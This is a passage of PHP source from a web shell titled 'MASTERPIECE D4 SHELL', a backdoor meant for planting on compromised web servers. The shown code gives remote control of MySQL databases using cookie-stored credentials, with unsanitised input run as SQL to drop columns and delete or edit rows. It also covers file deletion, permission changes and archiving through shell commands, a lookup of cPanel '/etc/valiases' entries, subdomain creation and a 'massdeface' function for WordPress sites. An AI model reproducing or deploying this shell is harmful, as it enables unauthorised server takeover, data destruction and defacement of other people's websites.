5720 $dbpass = $_COOKIE["dbpass"];
5721 $dbname = $_GET['dbname'];
5722 $tablename = $_GET['tablename'];
5723 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5724 mysql_select_db($dbname);
5725 mysql_query("delete from $tablename");
5726 listtable();
5727 }
5728
5729 // Empty Tables
5730 if($_GET['action'] == "dropField")
5731 {
5732 $dbserver = $_COOKIE["dbserver"];
5733 $dbuser = $_COOKIE["dbuser"];
5734 $dbpass = $_COOKIE["dbpass"];
5735 $dbname = $_GET['dbname'];
5736 $tablename = $_GET['tablename'];
5737 $fieldname = $_GET['fieldname'];
5738 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5739 mysql_select_db($dbname);
5740 $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
5741 mysql_select_db( $dbname, $mysqlHandle );
5742 mysql_query( $queryStr , $mysqlHandle );
5743 listtable();
5744 }
5745
5746 if($_GET['action'] == 'viewdb')
5747 {
5748 listdatabase();
5749 }
5750
5751 // View Table Schema
5752 if($_GET['action'] == "viewSchema")
5753 {
5754 $dbserver = $_COOKIE["dbserver"];
5755 $dbuser = $_COOKIE["dbuser"];
5756 $dbpass = $_COOKIE["dbpass"];
5757 $dbname = $_GET['dbname'];
5758 $tablename = $_GET['tablename'];
5759 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5760 mysql_select_db($dbname);
5761 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5762 $pResult = mysql_query( "SHOW fields FROM $tablename" );
5763 $num = mysql_num_rows( $pResult );
5764 echo "<br><br><table class=btmtbl align=center cellspacing=4 style='width:80%;' border=1>";
5765 echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
5766 for( $i = 0; $i < $num; $i++ )
5767 {
5768 $field = mysql_fetch_array( $pResult );
5769 echo "<tr>\n";
5770 echo "<td>".$field["Field"]."</td>\n";
5771 echo "<td>".$field["Type"]."</td>\n";
5772 echo "<td>".$field["Null"]."</td>\n";
5773 echo "<td>".$field["Key"]."</td>\n";
5774 echo "<td>".$field["Default"]."</td>\n";
5775 echo "<td>".$field["Extra"]."</td>\n";
5776 $fieldname = $field["Field"];
5777 echo "<td><a href=# onClick=\"viewtables('dropField','$dbname','$tablename','','','','$fieldname')\">Drop</a></td>\n";
5778 echo "</tr>\n";
5779 }
5780 echo "</table>";
5781 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5782 }
5783
5784 // Execute Query
5785 if($_GET['action'] == "executequery")
5786 {
5787 $dbserver = $_COOKIE["dbserver"];
5788 $dbuser = $_COOKIE["dbuser"];
5789 $dbpass = $_COOKIE["dbpass"];
5790 $dbname = $_GET['dbname'];
5791 $tablename = $_GET['tablename'];
5792 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5793 mysql_select_db($dbname);
5794 $result = mysql_query($_GET['executemyquery']);
5795
5796 // results
5797 echo "<html>\r\n". strtoupper($_GET['executemyquery']) . "<br>\r\n<table border =\"1\">\r\n";
5798
5799 $count = 0;
5800 while ($row = mysql_fetch_assoc($result))
5801 {
5802 echo "<tr>\r\n";
5803
5804 if ($count==0) // list column names
5805 {
5806 echo "<tr>\r\n";
5807 while($key = key($row))
5808 {
5809 echo "<td><b>" . $key . "</b></td>\r\n";
5810 next($row);
5811 }
5812 echo "</tr>\r\n";
5813 }
5814
5815 foreach($row as $r) // list content of column names
5816 {
5817 if ($r=='') $r = '<font >NULL</font>';
5818 echo "<td><font class=txt>" . $r . "</font></td>\r\n";
5819 }
5820 echo "</tr>\r\n";
5821 $count++;
5822 }
5823 echo "</table>\n\r<font class=txt size=3>" . $count . " rows returned.</font>\r\n</html>";
5824 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5825 }
5826
5827 // View Table Data
5828 if($_GET['action'] == "viewdata")
5829 {
5830 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
5831 $dbserver = $_COOKIE["dbserver"];
5832 $dbuser = $_COOKIE["dbuser"];
5833 $dbpass = $_COOKIE["dbpass"];
5834 $dbname = $_GET['dbname'];
5835 $tablename = $_GET['tablename'];
5836 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
5837 ?>
5838 <br><br>
5839 <form>
5840 <table>
5841 <tr>
5842 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
5843 </tr>
5844 <tr>
5845 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
5846 </tr>
5847 </table>
5848 </form>
5849 <?php
5850 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
5851 mysql_select_db($dbname);
5852
5853 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
5854 $row = mysql_fetch_array($sql);
5855 $rowid = $row['COLUMN_NAME'];
5856
5857 echo "<br><font size=4>Data in Table</font><br>";
5858 if( $tablename != "" )
5859 echo "<font size=3 class=txt>$dbname > $tablename</font><br>";
5860 else
5861 echo "<font size=3 class=txt>$dbname</font><br>";
5862
5863 $queryStr = "";
5864 $pag = 0;
5865 $queryStr = stripslashes( $queryStr );
5866 if( $queryStr == "" )
5867 {
5868 if(isset($_REQUEST['page']))
5869 {
5870 $res = mysql_query("select * from $tablename");
5871 $getres = mysql_num_rows($res);
5872 $coun = ceil($getres/30);
5873 if($_REQUEST['page'] != 1)
5874
5875 $pag = $_REQUEST['page'] * 30;
5876 else
5877 $pag = $_REQUEST['page'] * 30;
5878
5879 $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
5880 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
5881 $arrcount = 1;
5882 $arrdata[$arrcount] = 0;
5883 while($row = mysql_fetch_array($sql))
5884 {
5885 $arrdata[$arrcount] = $row[$rowid];
5886 $arrcount++;
5887 }
5888 }
5889 else
5890 {
5891 $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
5892 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
5893 $arrcount = 1;
5894 $arrdata[$arrcount] = 0;
5895 while($row = mysql_fetch_array($sql))
5896 {
5897 $arrdata[$arrcount] = $row[$rowid];
5898 $arrcount++;
5899 }
5900 }
5901 if( $orderby != "" )
5902 $queryStr .= " ORDER BY $orderby";
5903 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\"><font size=3>Schema</font></a>\n";
5904 }
5905
5906
5907 $pResult = mysql_query($queryStr );
5908 $fieldt = mysql_fetch_field($pResult);
5909 $tablename = $fieldt->table;
5910 $errMsg = mysql_error();
5911
5912 $GLOBALS[queryStr] = $queryStr;
5913
5914 if( $pResult == false )
5915 {
5916 echoQueryResult();
5917 return;
5918 }
5919 if( $pResult == 1 )
5920 {
5921 $errMsg = "Success";
5922 echoQueryResult();
5923 return;
5924 }
5925
5926 echo "<hr color='#1B1B1B'>\n";
5927
5928 $row = mysql_num_rows( $pResult );
5929 $col = mysql_num_fields( $pResult );
5930
5931 if( $row == 0 )
5932 {
5933 echo "<font size=3>No Data Exist!</font>";
5934 return;
5935 }
5936
5937 if( $rowperpage == "" ) $rowperpage = 30;
5938 if( $page == "" ) $page = 0;
5939 else $page--;
5940 mysql_data_seek( $pResult, $page * $rowperpage );
5941
5942 echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 align=center>\n";
5943 echo "<tr>\n";
5944 for( $i = 0; $i < $col; $i++ )
5945 {
5946 $field = mysql_fetch_field( $pResult, $i );
5947 echo "<th>";
5948 if($action == "viewdata")
5949 echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
5950 else
5951 echo $field->name."\n";
5952 echo "</th>\n";
5953 }
5954 echo "<th colspan=2>Action</th>\n";
5955 echo "</tr>\n";
5956 $num=1;
5957
5958
5959 $acount = 1;
5960
5961 for( $i = 0; $i < $rowperpage; $i++ )
5962 {
5963 $rowArray = mysql_fetch_row( $pResult );
5964 if( $rowArray == false ) break;
5965 echo "<tr>\n";
5966 $key = "";
5967 for( $j = 0; $j < $col; $j++ )
5968 {
5969 $data = $rowArray[$j];
5970
5971 $field = mysql_fetch_field( $pResult, $j );
5972 if( $field->primary_key == 1 )
5973 $key .= "&" . $field->name . "=" . $data;
5974
5975 if( strlen( $data ) > 30 )
5976 $data = substr( $data, 0, 30 ) . "...";
5977 $data = htmlspecialchars( $data );
5978 echo "<td>\n";
5979 echo "<font class=txt>$data</font>\n";
5980 echo "</td>\n";
5981 }
5982
5983 if(!is_numeric($arrdata[$acount]))
5984 echo "<td colspan=2>No Key</td>\n";
5985 else
5986 {
5987 echo "<td><a href=# onClick=\"viewtables('editData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Edit</a></td>\n";
5988 echo "<td><a href=# onClick=\"viewtables('deleteData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Delete</a></td>\n";
5989 $acount++;
5990 }
5991 }
5992 echo "</tr>\n";
5993
5994
5995 echo "</table>";
5996 if($arrcount > 30)
5997 {
5998 $res = mysql_query("select * from $tablename");
5999 $getres = mysql_num_rows($res);
6000 $coun = ceil($getres/30);
6001 echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
6002 for($i=0;$i<$coun;$i++)
6003 echo "<option value=$i>$i</option>";
6004
6005 echo "</select> <input type=button onClick=\"viewtables('viewdata','$dbname','$tablename','','','','',page.value)\" value=Go class=but></form>";
6006 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
6007 }
6008 }
6009
6010 // Delete Table Data
6011 if($_GET['action'] == "deleteData")
6012 {
6013 $dbserver = $_COOKIE["dbserver"];
6014 $dbuser = $_COOKIE["dbuser"];
6015 $dbpass = $_COOKIE["dbpass"];
6016 $dbname = $_GET['dbname'];
6017 $tablename = $_GET['tablename'];
6018 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6019 mysql_select_db($dbname);
6020 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6021 $row = mysql_fetch_array($sql);
6022 $row = $row['COLUMN_NAME'];
6023 $rowid = $_GET[$row];
6024 mysql_query("delete from $tablename where $row = '$rowid'");
6025 listtable();
6026 }
6027 // Edit Table Data
6028 if($_GET['action'] == "editData")
6029 {
6030 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
6031 $dbserver = $_COOKIE["dbserver"];
6032 $dbuser = $_COOKIE["dbuser"];
6033 $dbpass = $_COOKIE["dbpass"];
6034 $dbname = $_GET['dbname'];
6035 $tablename = $_GET['tablename'];
6036 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
6037 ?>
6038 <br><br>
6039 <form action="<?php echo $self; ?>" method="post">
6040 <?php
6041 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6042 mysql_select_db($dbname);
6043
6044 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6045 $row = mysql_fetch_array($sql);
6046 $row = $row['COLUMN_NAME'];
6047 $rowid = $_GET[$row];
6048
6049 $pResult = mysql_list_fields( $dbname, $tablename );
6050 $num = mysql_num_fields( $pResult );
6051
6052 $key = "";
6053 for( $i = 0; $i < $num; $i++ )
6054 {
6055 $field = mysql_fetch_field( $pResult, $i );
6056 if( $field->primary_key == 1 )
6057 if( $field->numeric == 1 )
6058 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
6059 else
6060 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
6061 }
6062 $key = substr( $key, 0, strlen($key)-4 );
6063
6064 mysql_select_db( $dbname, $mysqlHandle );
6065 $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
6066 $data = mysql_fetch_array( $pResult );
6067
6068 echo "<table class=btmtbl cellspacing=1 cellpadding=2 border=1>\n";
6069 echo "<tr>\n";
6070 echo "<th>Name</th>\n";
6071 echo "<th>Type</th>\n";
6072 echo "<th>Function</th>\n";
6073 echo "<th>Data</th>\n";
6074 echo "</tr>\n";
6075
6076 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6077 $num = mysql_num_rows( $pResult );
6078
6079 $pResultLen = mysql_list_fields( $dbname, $tablename );
6080 $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',";
6081 $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',";
6082 for( $i = 0; $i < $num; $i++ )
6083 {
6084 $field = mysql_fetch_array( $pResult );
6085 $fieldname = $field["Field"];
6086 $fieldtype = $field["Type"];
6087 $len = mysql_field_len( $pResultLen, $i );
6088
6089 echo "<tr>";
6090 echo "<td>$fieldname</td>";
6091 echo "<td>".$field["Type"]."</td>";
6092 echo "<td>\n";
6093 echo "<select name=${fieldname}_function class=sbox>\n";
6094 echo "<option>\n";
6095 echo "<option>ASCII\n";
6096 echo "<option>CHAR\n";
6097 echo "<option>SOUNDEX\n";
6098 echo "<option>CURDATE\n";
6099 echo "<option>CURTIME\n";
6100 echo "<option>FROM_DAYS\n";
6101 echo "<option>FROM_UNIXTIME\n";
6102 echo "<option>NOW\n";
6103 echo "<option>PASSWORD\n";
6104 echo "<option>PERIOD_ADD\n";
6105 echo "<option>PERIOD_DIFF\n";
6106 echo "<option>TO_DAYS\n";
6107 echo "<option>USER\n";
6108 echo "<option>WEEKDAY\n";
6109 echo "<option>RAND\n";
6110 echo "</select>\n";
6111 echo "</td>\n";
6112 $value = htmlspecialchars($data[$i]);
6113 $type = strtok( $fieldtype, " (,)\n" );
6114 if( $type == "enum" || $type == "set" )
6115 {
6116 echo "<td>\n";
6117 if( $type == "enum" )
6118 echo "<select name=$fieldname class=box>\n";
6119 else if( $type == "set" )
6120 echo "<select name=$fieldname size=4 class=box multiple>\n";
6121 while( $str = strtok( "'" ) )
6122 {
6123 if( $value == $str )
6124 echo "<option selected>$str\n";
6125 else
6126 echo "<option>$str\n";
6127 strtok( "'" );
6128 }
6129 echo "</select>\n";
6130 echo "</td>\n";
6131 }
6132 else
6133 {
6134 if( $len < 40 )
6135 echo "<td><input type=text size=40 maxlength=$len id=dhanush_$fieldname name=sql_$fieldname value=\"$value\" class=box></td>\n";
6136 else
6137 echo "<td><textarea cols=47 rows=3 maxlength=$len name=dhanush_$fieldname class=box>$value</textarea>\n";
6138 }
6139 $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
6140 $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
6141 echo "</tr>";
6142 }
6143 $fundata1=eregi_replace(',$', '', $fundata1);
6144 $fundata2=eregi_replace(',$', '', $fundata2);
6145
6146 echo "</table><p>\n";
6147 echo "<input type=button onClick=\"editdata($fundata1)\" value='Edit Data' class=but>\n";
6148 echo "<input type=button value='Insert' onClick=\"editdata($fundata2)\" class=but>\n";
6149 echo "</form>\n";
6150 }
6151 }
6152// Edit Submit Table Data
6153else if($_REQUEST['action'] == "editsubmitData")
6154{
6155 $dbserver = $_COOKIE["dbserver"];
6156 $dbuser = $_COOKIE["dbuser"];
6157 $dbpass = $_COOKIE["dbpass"];
6158 $dbname = $_POST['dbname'];
6159 $tablename = $_POST['tablename'];
6160
6161 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6162 mysql_select_db($dbname);
6163
6164 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6165 $row = mysql_fetch_array($sql);
6166 $row = $row['COLUMN_NAME'];
6167 $rowid = $_POST[$row];
6168
6169 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6170 $num = mysql_num_rows( $pResult );
6171
6172 $rowcount = $num;
6173
6174 $pResultLen = mysql_list_fields( $dbname, $tablename );
6175
6176 for( $i = 0; $i < $num; $i++ )
6177 {
6178 $field = mysql_fetch_array( $pResult );
6179 $fieldname = $field["Field"];
6180 $arrdata = $_REQUEST[$fieldname];
6181
6182 $str .= " " . $fieldname . " = '" . $arrdata . "'";
6183 $rowcount--;
6184 if($rowcount != 0)
6185 $str .= ",";
6186 }
6187
6188 $str = "update $tablename set" . $str . " where $row=$rowid";
6189 mysql_query($str);
6190 ?><div id="showsql"></div><?php
6191}
6192// Insert Table Data
6193else if($_REQUEST['action'] == "insertdata")
6194{
6195 $dbserver = $_COOKIE["dbserver"];
6196 $dbuser = $_COOKIE["dbuser"];
6197 $dbpass = $_COOKIE["dbpass"];
6198 $dbname = $_POST['dbname'];
6199 $tablename = $_POST['tablename'];
6200
6201 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6202 mysql_select_db($dbname);
6203
6204 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
6205 $row = mysql_fetch_array($sql);
6206 $row = $row['COLUMN_NAME'];
6207 $rowid = $_POST[$row];
6208
6209 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
6210 $num = mysql_num_rows( $pResult );
6211
6212 $rowcount = $num;
6213
6214 $pResultLen = mysql_list_fields( $dbname, $tablename );
6215
6216 for( $i = 0; $i < $num; $i++ )
6217 {
6218 $field = mysql_fetch_array( $pResult );
6219 $fieldname = $field["Field"];
6220 $arrdata = $_REQUEST[$fieldname];
6221
6222 $str1 .= "".$fieldname . ",";
6223 $str2 .= "'".$arrdata . "',";
6224 $rowcount--;
6225 if($rowcount != 0)
6226 {
6227 //$str1 .= $fieldname . ",";
6228 //$str2 .= $arrdata . ",";
6229 }
6230 }
6231 $str1=eregi_replace(',$', '', $str1);
6232 $str2=eregi_replace(',$', '', $str2);
6233 $str = "INSERT INTO `$tablename` ($str1) VALUES ($str2);";
6234 mysql_query($str);
6235
6236 ?><div id="showsql"></div><?php
6237}
6238else if(isset($_GET['logoutdb']))
6239{
6240 setcookie("dbserver",time() - 60*60);
6241 setcookie("dbuser",time() - 60*60);
6242 setcookie("dbpass",time() - 60*60);
6243 header("Location:$self");
6244}
6245else if(isset($_POST['choice']))
6246{
6247 if($_POST['choice'] == "delete")
6248 {
6249 $actbox = $_POST["actbox"];
6250 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6251
6252 foreach ($actbox as $myv)
6253 $myv = explode(",",$myv);
6254 foreach ($myv as $v)
6255 {
6256 if(is_file($v))
6257 {
6258 if(unlink($v))
6259 echo "<br><center><font class=txt>File $v Deleted Successfully</font></center>";
6260 else
6261 echo "<br><center>Cannot Delete File $v</center>";
6262 }
6263 else if(is_dir($v))
6264 {
6265 rrmdir($v);
6266 }
6267 }
6268 echo '<br>';
6269 }
6270 else if($_POST['choice'] == "chmod")
6271 { ?>
6272 <BR><form id="chform"><?php
6273 $actbox1 = $_POST['actbox'];
6274 foreach ($actbox1 as $myv)
6275 $myv = explode(",",$myv);
6276 foreach ($myv as $v)
6277 { ?>
6278 <input type="hidden" name="actbox3[]" id="actbox3[]" value="<?php echo $v; ?>">
6279 <?php }
6280 ?>
6281 <table align="center" border="3" style="width:40%; border-color:#333333;">
6282 <tr>
6283 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
6284 </tr>
6285 <tr>
6286 <td colspan="2" align="center" style="height:60px">
6287 <input type="button" onClick="myaction('changefileperms',chmode.value)" value="Change Permission" class="but" style="padding: 5px;" />
6288 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" /></form></center>
6289 </td>
6290 </tr>
6291 </table>
6292
6293 </form> <?php
6294 }
6295 else if($_POST['choice'] == "changefileperms")
6296 {
6297 if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
6298 {
6299 $actbox = $_POST["actbox"];
6300 foreach ($actbox as $myv)
6301 $myv = explode(",",$myv);
6302 foreach ($myv as $v)
6303 {
6304 if(is_file($v) || is_dir($v))
6305 {
6306 $perms = 0;
6307 for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
6308 $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
6309 echo "<div align=left style=width:60%;>";
6310 if(@chmod($v,$perms))
6311 echo "<font class=txt>File $v Permissions Changed Successfully</font><br>";
6312 else
6313 echo "Cannot Change $v File Permissions<br>";
6314 echo "</div>";
6315 }
6316 }
6317
6318 }
6319 }
6320 else if($_POST['choice'] == "compre")
6321 {
6322 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6323 $actbox = $_POST["actbox"];
6324 foreach ($actbox as $myv)
6325 $myv = explode(",",$myv);
6326 foreach ($myv as $v)
6327 {
6328 if(is_file($v))
6329 {
6330 $zip = new ZipArchive();
6331 $filename= basename($v) . '.zip';
6332 if(($zip->open($filename, ZipArchive::CREATE))!==true)
6333 { echo '<br><font size=3>Error: Unable to create zip file for $v</font>';}
6334 else {echo "<br><font class=txt size=3>File $v Compressed successfully</font>";}
6335 $zip->addFile(basename($v));
6336 $zip->close();
6337 }
6338 else if(is_dir($v))
6339 {
6340 if($os == "Linux")
6341 {
6342 $filename= basename($v);
6343 execmd("tar --create --recursion --file=$filename.tar $v");
6344 echo "<br><font class=txt size=3>File $v Compressed successfully as $v.tar</font>";
6345 }
6346 else
6347 echo "<BR>Cannot compress directory<BR><BR>";
6348 }
6349 }
6350 echo '<BR><BR>';
6351 }
6352 else if($_POST['choice'] == "uncompre")
6353 {
6354 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" />';
6355 $actbox = $_POST["actbox"];
6356 foreach ($actbox as $myv)
6357 $myv = explode(",",$myv);
6358 foreach ($myv as $v)
6359 {
6360 if(is_file($v) || is_dir($v))
6361 {
6362 $zip = new ZipArchive;
6363 $filename= basename($v);
6364 $res = $zip->open($filename);
6365 if ($res === TRUE)
6366 {
6367 $pieces = explode(".",$filename);
6368 $zip->extractTo($pieces[0]);
6369 $zip->close();
6370 echo '<BR><font class=txt size=3>File '.$v.' Unzipped successfully</font>';
6371 } else
6372 echo "<br><font size=3>Error: Unable to Unzip file $v</font>";
6373 }
6374 }
6375 echo '<BR><BR>';
6376 }
6377}
6378else if(isset($_GET['sitename']))
6379{
6380 $sitename = str_replace("http://","",$_GET['sitename']);
6381 $sitename = str_replace("http://www.","",$sitename);
6382 $sitename = str_replace("www.","",$sitename);
6383 $show = myexe("ls -la /etc/valiases/".$sitename);
6384 if(!empty($show))
6385 echo $show;
6386 else
6387 echo "Cannot get the username";
6388}
6389else if(isset($_GET['mydata']))
6390{
6391 listdatabase();
6392}
6393else if(isset($_GET['home']))
6394{
6395 mainfun($_GET['home']);
6396}
6397else if(isset($_GET['dir']))
6398{
6399 mainfun($_GET['myfilepath']);
6400}
6401else if(isset($_GET['mydirpath']))
6402{
6403 echo is_writable($_GET['mydirpath'])?"<font class=txt>< writable ></font>":"< not writable >";
6404}
6405else
6406{
6407?>
6408<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
6409<title>MASTERPIECE D4 SHELL</title>
6410<script type="text/javascript">
6411checked = false;
6412var waitstate = "<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
6413function checkedAll ()
6414{
6415 if (checked == false){checked = true}else{checked = false}
6416 for (var i = 0; i < document.getElementById('myform').elements.length; i++)
6417 {
6418 document.getElementById('myform').elements[i].checked = checked;
6419 }
6420}
6421function change_style(mystyle)
6422{
6423 window.location.href = '<?php echo $self; ?>?style='+mystyle;
6424}
6425function createsubdomain(cpaneluser,cpanelpass,noofsubdomain,subindex)
6426{
6427 var params = "cpaneluser="+cpaneluser+"&cpanelpass="+cpanelpass+"&noofsubdomain="+noofsubdomain+"&subindex="+subindex;
6428 document.getElementById("showmydata").innerHTML=waitstate;
6429 var ajaxRequest;
6430 ajaxRequest = new XMLHttpRequest();
6431
6432 ajaxRequest.onreadystatechange = function()
6433 {
6434 if(ajaxRequest.readyState == 3)
6435 {
6436 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6437 }
6438 }
6439
6440 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6441 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6442 ajaxRequest.send(params);
6443}
6444function massdeface(script,masswpdef,wpsym)
6445{
6446 var params = "massscript="+script+"&massdef="+masswpdef+"&wpsym="+wpsym;
6447 document.getElementById("showdef").innerHTML="<center><marquee scrollamount=4 width=150>It may take long time. Wait....</marquee></center>";
6448 var ajaxRequest;
6449 ajaxRequest = new XMLHttpRequest();
6450
6451 ajaxRequest.onreadystatechange = function()
6452 {
6453 if(ajaxRequest.readyState == 3)
6454 {
6455 document.getElementById("showdef").innerHTML=ajaxRequest.responseText;
6456 }
6457 }
6458
6459 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6460 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6461 ajaxRequest.send(params);
6462}
6463function urlchange(myfilepath)
6464{
6465 var mypath, mpath, i, t, j, r = "",myurl = "",splitter="";
6466 splitter = "<?php echo addslashes($directorysperator); ?>";
6467 mypath = mpath = myfilepath.split(splitter);
6468 <?php if($os == "Linux") { ?>
6469 r = "/";
6470 myurl = "<a href=javascript:void(0) onClick=\"changedir('dir','/')\">/</a>";
6471 <?php } ?>
6472 for (i = 0; i < mypath.length; i++)
6473 {
6474 if(mypath[i] == "")
6475 continue;
6476 r += mypath[i]+"<?php echo addslashes($directorysperator); ?>";
6477
6478 myurl += "<a href=javascript:void(0) onClick=\"changedir('dir','"+r+"\')\"><b>"+mypath[i]+"<?php echo addslashes($directorysperator); ?></b></a>";
6479 }
6480 myurl = myurl.replace(/\\/g,"\\\\");
6481 return myurl;
6482}
6483function wrtblDIR(mydirpath)
6484{
6485 var ajaxRequest;
6486 ajaxRequest = new XMLHttpRequest();
6487
6488 ajaxRequest.onreadystatechange = function()
6489 {
6490 if(ajaxRequest.readyState == 4)
6491 {
6492 for(i=0;i<=3;i++)
6493 document.getElementsByName("wrtble")[i].innerHTML=ajaxRequest.responseText;
6494 }
6495 }
6496
6497 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydirpath="+mydirpath, true);
6498 ajaxRequest.send(null);
6499}
6500function setpath(myfilpath)
6501{
6502 wrtblDIR(myfilpath);
6503 document.getElementById("path").value=myfilpath;
6504 document.getElementById("createfile").value=myfilpath;
6505 document.getElementById("readfile").value=myfilpath;
6506 document.getElementById("readdir").value=myfilpath;
6507 document.getElementById("createfolder").value=myfilpath;
6508 document.getElementById("createfolder").value=myfilpath;
6509 document.getElementById("exepath").value=myfilpath;
6510 document.getElementById("auexepath").value=myfilpath;
6511 document.getElementById("showdir").innerHTML="";
6512}
6513function changedir(myaction,myfilepath)
6514{
6515 var myurl = urlchange(myfilepath);
6516
6517 document.getElementById("showmaindata").innerHTML=waitstate;
6518 var ajaxRequest;
6519 ajaxRequest = new XMLHttpRequest();
6520
